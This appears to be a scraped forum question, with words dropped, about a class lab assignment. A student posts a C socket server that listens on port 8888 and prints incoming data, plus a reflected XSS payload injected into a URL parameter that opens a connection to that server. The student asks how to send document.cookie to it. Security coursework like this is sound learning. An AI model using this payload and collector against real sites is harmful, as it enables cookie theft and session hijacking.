cookies - How can I get my XSS script to properly talk to my C server? -
for class assignment, told use xss attack steal cookie. given vm work on , client steal cookie. have ability use telnet make client go url want, unable view directly happens. given website on server vulnerable. since network closed , client able visit sites hosted either provided server or vm, professor suggested write simple c server, have listen on specific port, , send cookie through allow server print it.
here server using. listening on port 8888.
#include<stdio.h> #include<string.h> //strlen #include<sys/socket.h> #include<arpa/inet.h> //inet_addr #include<unistd.h> //write int main(int argc , char *argv[]) { int socket_desc , client_sock , c , read_size; struct sockaddr_in server , client; char client_message[2000]; //create socket socket_desc = socket(af_inet , sock_stream , 0); if (socket_desc == -1) { printf("could not create socket"); } puts("socket created"); //prepare sockaddr_in structure server.sin_family = af_inet; server.sin_addr.s_addr = inaddr_any; server.sin_port = htons( 8888 ); //bind if( bind(socket_desc,(struct sockaddr *)&server , sizeof(server)) < 0) { //print error message perror("bind failed. error"); return 1; } puts("bind done"); //listen listen(socket_desc , 3); //accept , incoming connection puts("waiting incoming connections..."); c = sizeof(struct sockaddr_in); //accept connection incoming client client_sock = accept(socket_desc, (struct sockaddr *)&client, (socklen_t*)&c); if (client_sock < 0) { perror("accept failed"); return 1; } puts("connection accepted"); //receive message client while( (read_size = recv(client_sock , client_message , 2000 , 0)) > 0 ) { //send message client //write(client_sock , client_message , strlen(client_message)); printf("%s \n",client_message); } if(read_size == 0) { puts("client disconnected"); fflush(stdout); } else if(read_size == -1) { perror("recv failed"); } return 0; } i have gotten can use xss attack connected server, not know how send across cookie. know stored in document.cookie. trying ...websiteurl...?user="><script>window.open("http://localhost:8888")</script> url of vulnerable site establishes connection server (my server says so), not know here.do need modify server in way accept kind of input? have tried ..localhost:8888?test" , 404 error.
in short: how can use xss attack send cookie c server?
Comments
Post a Comment